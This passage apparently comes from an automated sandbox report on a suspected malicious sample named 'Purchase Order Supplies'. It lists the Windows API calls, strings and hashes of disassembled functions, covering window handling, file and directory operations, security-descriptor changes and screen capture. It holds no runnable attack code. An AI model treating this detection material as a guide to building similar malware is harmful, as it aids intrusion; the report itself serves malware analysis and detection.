                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C90000,00000000), ref: 00CFCE85
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFCEA4
                          • GetDesktopWindow.USER32 ref: 00CFCEB9
                          • GetWindowRect.USER32(00000000), ref: 00CFCEC0
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CFCED2
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CFCEEA
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 1297703922-3619404913
                          • Opcode ID: 2e2f60d081aee8ebb37f85e31506debd9de03623b842ada67141040389d6a36a
                          • Instruction ID: 16039563c60ab0ddd7da24f9aea7b54c37793d5391cffa6628b130c12357a126
                          • Opcode Fuzzy Hash: 2e2f60d081aee8ebb37f85e31506debd9de03623b842ada67141040389d6a36a
                          • Instruction Fuzzy Hash: 19719C7524030DAFDB25CF28CC85FBA3BE5AB89704F440518FA95973A1DB70E902CB22
                          Function 00CDB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00CDB46D
                          • VariantCopy.OLEAUT32(?,?), ref: 00CDB476
                          • VariantClear.OLEAUT32(?), ref: 00CDB482
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CDB561
                          • __swprintf.LIBCMT ref: 00CDB591
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00CDB5BD
                          • VariantInit.OLEAUT32(?), ref: 00CDB63F
                          • SysFreeString.OLEAUT32(00000016), ref: 00CDB6D1
                          • VariantClear.OLEAUT32(?), ref: 00CDB727
                          • VariantClear.OLEAUT32(?), ref: 00CDB736
                          • VariantInit.OLEAUT32(00000000), ref: 00CDB772
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: d18270a53755dde40483182cc77ed8393b6c075c2e341f7273ce1e78811766f1
                          • Instruction ID: ee2e4316048477228e9cfe623e1b568d5b80fcb203e0dddc76b46685a3fd3d97
                          • Opcode Fuzzy Hash: d18270a53755dde40483182cc77ed8393b6c075c2e341f7273ce1e78811766f1
                          • Instruction Fuzzy Hash: 76C10231A00215EBCF14DF66D494B6AB7B4FF05300F26846BE6159B382DB30ED41EBA1
                          Function 00CF6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00CF6FF9
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CF7044
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 3974292440-4258414348
                          • Opcode ID: f4cd3247ceaf636e6ccf492b8d357320f96d8f4608e0bac1a52a8bb9049ef80a
                          • Instruction ID: 07f758ef92a0f56e2ded87f95e0b8b59a2d17591cbbe3302db23e8b95aab665a
                          • Opcode Fuzzy Hash: f4cd3247ceaf636e6ccf492b8d357320f96d8f4608e0bac1a52a8bb9049ef80a
                          • Instruction Fuzzy Hash: C091B4342047069FCB04EF14C851B6DB7A2AF85354F04896DF9966B392CF35ED4ADB82
                          Function 00CFE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CFE3BB
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CF9615,?), ref: 00CFE417
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE457
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE49C
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE4D3
                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00CF9615,?), ref: 00CFE4DF
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CFE4EF
                          • DestroyCursor.USER32(?), ref: 00CFE4FE
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CFE51B
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CFE527
                            • Part of subcall function 00CB1BC7: __wcsicmp_l.LIBCMT ref: 00CB1C50
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 3907162815-1154884017
                          • Opcode ID: 24b2fb9de531fce1b1d7ff3a59fbbc1fb076e0cfc307426cee7ca9e68777b6b5
                          • Instruction ID: 5abf2b7c38bcf96d6b120c95f69c201003eb047bbe877ce2d2c1adc32a75f7d1
                          • Opcode Fuzzy Hash: 24b2fb9de531fce1b1d7ff3a59fbbc1fb076e0cfc307426cee7ca9e68777b6b5
                          • Instruction Fuzzy Hash: 1661B071540219BFEB14DF64CC46FFA7BA9BB08710F108115FA25E71E0DB749A85D7A0
                          Function 00CE0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00CE0EFF
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CE0F0F
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE0F1B
                          • __wsplitpath.LIBCMT ref: 00CE0F79
                          • _wcscat.LIBCMT ref: 00CE0F91
                          • _wcscat.LIBCMT ref: 00CE0FA3
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CE0FB8
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0FCC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0FFE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE101F
                          • _wcscpy.LIBCMT ref: 00CE102B
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE106A
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: cafe104a61ef9b7cf2f494d5a8aeccbe41c0cbaa191be67f073a893b494e0ded
                          • Instruction ID: 1c1c34c86cdc1398fc482d7f31f6342549957efb4d1553877d5c29fd6ca0b151
                          • Opcode Fuzzy Hash: cafe104a61ef9b7cf2f494d5a8aeccbe41c0cbaa191be67f073a893b494e0ded
                          • Instruction Fuzzy Hash: 8A618372504345AFC710DF65C84599EB3E8FF89310F04891EF999D7251EB31EA45CB92
                          Function 00CDDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • CharLowerBuffW.USER32(?,?), ref: 00CDDB26
                          • GetDriveTypeW.KERNEL32 ref: 00CDDB73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDDBBB
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDDBF2
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDDC20
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 2698844021-4113822522
                          • Opcode ID: da096711a2de3ebad648a36d0a577eb6535d6a2ed706df363323f3fe38b0dd5b
                          • Instruction ID: a495500cf29aa33e2862172617fecaf8414b223d96d9f4174c459616d50b7e45
                          • Opcode Fuzzy Hash: da096711a2de3ebad648a36d0a577eb6535d6a2ed706df363323f3fe38b0dd5b
                          • Instruction Fuzzy Hash: 70517B71504305AFCB00EF14C89196AB7F8FF88758F00896DF896972A1DB31EE09DB92
                          Function 00CD3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00CD3145
                          • LoadStringW.USER32(00000000,?,00D04085,00000016), ref: 00CD314E
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00D04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00CD3170
                          • LoadStringW.USER32(00000000,?,00D04085,00000016), ref: 00CD3173
                          • __swprintf.LIBCMT ref: 00CD31B3
                          • __swprintf.LIBCMT ref: 00CD31C5
                          • _wprintf.LIBCMT ref: 00CD326C
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD3283
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 984253442-2268648507
                          • Opcode ID: f19f9dd2f5b58478e9cdd02d533646fb65f16fa7d639cac896ed3024c31721f4
                          • Instruction ID: 030c52bedd2e86e8f05db0a6fd7442db5abfbdccf9a7d22536c946aa94feb152
                          • Opcode Fuzzy Hash: f19f9dd2f5b58478e9cdd02d533646fb65f16fa7d639cac896ed3024c31721f4
                          • Instruction Fuzzy Hash: 7A415171900259BBCF15FB90DD8AEEEB779AF14741F100065F601B21A2DF656F08EA71
                          Function 00CDD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00CDD96C
                          • __swprintf.LIBCMT ref: 00CDD98E
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDD9CB
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDD9F0
                          • _memset.LIBCMT ref: 00CDDA0F
                          • _wcsncpy.LIBCMT ref: 00CDDA4B
                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00CDDA80
                          • CloseHandle.KERNEL32(00000000), ref: 00CDDA8B
                          • RemoveDirectoryW.KERNEL32(?), ref: 00CDDA94
                          • CloseHandle.KERNEL32(00000000), ref: 00CDDA9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 1af8acda287f985947b91557e88fd633fbb0d2b25f6f592ef308c21426d79413
                          • Instruction ID: 3d562e30ce399114468bd22773bab0692366365bd5734c3c5a47fce76d905007
                          • Opcode Fuzzy Hash: 1af8acda287f985947b91557e88fd633fbb0d2b25f6f592ef308c21426d79413
                          • Instruction Fuzzy Hash: F931A871A00208BBDB20DFA4DC49FDA77BDBF84700F14C1A6F519D2160EB719B859BA1
                          Function 00CFE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CFE564
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CFE57B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CFE586
                          • CloseHandle.KERNEL32(00000000), ref: 00CFE593
                          • GlobalLock.KERNEL32(00000000), ref: 00CFE59C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CFE5AB
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CFE5B4
                          • CloseHandle.KERNEL32(00000000), ref: 00CFE5BB
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CFE5CC
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D1D9BC,?), ref: 00CFE5E5
                          • GlobalFree.KERNEL32(00000000), ref: 00CFE5F5
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CFE619
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CFE644
                          • DeleteObject.GDI32(00000000), ref: 00CFE66C
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CFE682
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: b1f21e89a59babc353d1ee4b2f0994570112dc40870293f696b046f010b6b74d
                          • Instruction ID: e7235fd166c9d2d8370787953d4c768774d987237fffae89bc3796d318469a31
                          • Opcode Fuzzy Hash: b1f21e89a59babc353d1ee4b2f0994570112dc40870293f696b046f010b6b74d
                          • Instruction Fuzzy Hash: DD414A75600308BFDB119F65DC48EAA7BBAEF89715F108058F916D7260DB309E42DB20
                          Function 00CE0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • __wsplitpath.LIBCMT ref: 00CE0C93
                          • _wcscat.LIBCMT ref: 00CE0CAB
                          • _wcscat.LIBCMT ref: 00CE0CBD
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CE0CD2
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0CE6
                          • GetFileAttributesW.KERNEL32(?), ref: 00CE0CFE
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CE0D18
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0D2A
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                          • String ID: *.*
                          • API String ID: 34673085-438819550
                          • Opcode ID: bc64d67e613f5bfce5b832004f9afde765bce277aa19c906e80378d8b0381b3f
                          • Instruction ID: f072d9000ce06fa7bdee58a29a19b5cc89e6d4863157132c8e738d8741853acc
                          • Opcode Fuzzy Hash: bc64d67e613f5bfce5b832004f9afde765bce277aa19c906e80378d8b0381b3f
                          • Instruction Fuzzy Hash: F581B4715043859FC720DF66C8459AAB7E8BB88314F34892AF895C7251E774DEC4CB92
                          Function 00CCB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCB903
                            • Part of subcall function 00CCB8E7: GetLastError.KERNEL32(?,00CCB3CB,?,?,?), ref: 00CCB90D
                            • Part of subcall function 00CCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00CCB3CB,?,?,?), ref: 00CCB91C
                            • Part of subcall function 00CCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00CCB3CB), ref: 00CCB923
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCB93A
                            • Part of subcall function 00CCB982: GetProcessHeap.KERNEL32(00000008,00CCB3E1,00000000,00000000,?,00CCB3E1,?), ref: 00CCB98E
                            • Part of subcall function 00CCB982: RtlAllocateHeap.NTDLL(00000000,?,00CCB3E1), ref: 00CCB995
                            • Part of subcall function 00CCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCB3E1,?), ref: 00CCB9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCB5F7
                          • _memset.LIBCMT ref: 00CCB60C
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCB62B
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB63C
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCB679
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCB695
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB6B2
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCB6C1
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CCB6C8
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCB6E9
                          • CopySid.ADVAPI32(00000000), ref: 00CCB6F0
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCB721
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCB747
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCB75B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: ab57baf3a1729cd7a7aa6142eb67baa6ff74964d74d4ac37e6a27bdf0b14c65f
                          • Instruction ID: 03b347074ae9e389ef69ac68aa1e97b86a52adad0d58d2eee872f937e4786ce1
                          • Opcode Fuzzy Hash: ab57baf3a1729cd7a7aa6142eb67baa6ff74964d74d4ac37e6a27bdf0b14c65f
                          • Instruction Fuzzy Hash: AC51297590020AABDF049FA4DD46EEEBB79BF48344F04815DF925E6290DB35DE06CB60
                          Function 00CEA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00CEA2DD
                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CEA2E9
                          • CreateCompatibleDC.GDI32(?), ref: 00CEA2F5
                          • SelectObject.GDI32(00000000,?), ref: 00CEA302
                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CEA356
                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00CEA392
                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CEA3B6
                          • SelectObject.GDI32(00000006,?), ref: 00CEA3BE
                          • DeleteObject.GDI32(?), ref: 00CEA3C7
                          • DeleteDC.GDI32(00000006), ref: 00CEA3CE
                          • ReleaseDC.USER32(00000000,?), ref: 00CEA3D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
